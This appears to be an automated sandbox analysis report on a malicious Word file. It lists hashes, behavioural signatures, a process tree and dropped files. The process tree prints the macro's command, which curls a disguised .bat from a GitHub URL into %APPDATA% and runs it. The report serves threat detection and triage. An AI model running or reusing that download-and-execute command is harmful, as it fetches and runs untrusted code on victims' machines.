Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    11-04-2024 01:15

General

  • Target

    4aadd3bf071f87781910766f30baa4ebc20d6c26485b21830cee76d4d8eb8b6d.doc

  • Size

    35KB

  • MD5

    582a41f1e6c7266f4473a396ed841261

  • SHA1

    0ac2b6ceb2ec13575b3b1448e72bc7958841b899

  • SHA256

    4aadd3bf071f87781910766f30baa4ebc20d6c26485b21830cee76d4d8eb8b6d

  • SHA512

    738e804dea2eaf95b4652958a9da042aa64bf39a0bb8a02101fbb9b03bc6867306d466122e96937112cdf11c96139a3a9a2fc82eb1d475be8c4629d4ed3b4b3c

  • SSDEEP

    192:wsWNslLZEvA+6/6r8px8SmvowzxeuQ9iBqyQYYTgN0j8ywc6tAHUkanRasQ:wC8iS8px8SMDen9BCUgN0jw/tgUkanj

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4aadd3bf071f87781910766f30baa4ebc20d6c26485b21830cee76d4d8eb8b6d.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c curl https://raw.githubusercontent.com/NHTBOOT/1/main/pic.jpg --output %APPDATA%\Punn.bat && timeout 1 && start %APPDATA%\Punn.bat
      2⤵
      • Process spawned unexpected child process
      PID:2548
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2188

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      8c6a95cc6f30f08012ce3e433a8d0e81

      SHA1

      e3715f7e1034e608db4fc24a257b988913257a03

      SHA256

      82f73c79c5536dc2e3f4bea09f1f32d356eda5b1bf16083228c8ca2005faedd2

      SHA512

      8b4617d0b4f7975e5f5d6364b8356d1a84469f9e9b24508208c99b739181d346b05d51c048f69d0d4e1b3ec63202ded26c00d1d7824c8155b310247104ca96aa

    • memory/2128-0-0x000000002FE01000-0x000000002FE02000-memory.dmp
      Filesize

      4KB

    • memory/2128-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2128-2-0x0000000070E4D000-0x0000000070E58000-memory.dmp
      Filesize

      44KB

    • memory/2128-7-0x00000000059B0000-0x0000000005AB0000-memory.dmp
      Filesize

      1024KB

    • memory/2128-14-0x0000000070E4D000-0x0000000070E58000-memory.dmp
      Filesize

      44KB

    • memory/2128-15-0x00000000059B0000-0x0000000005AB0000-memory.dmp
      Filesize

      1024KB

    • memory/2128-30-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB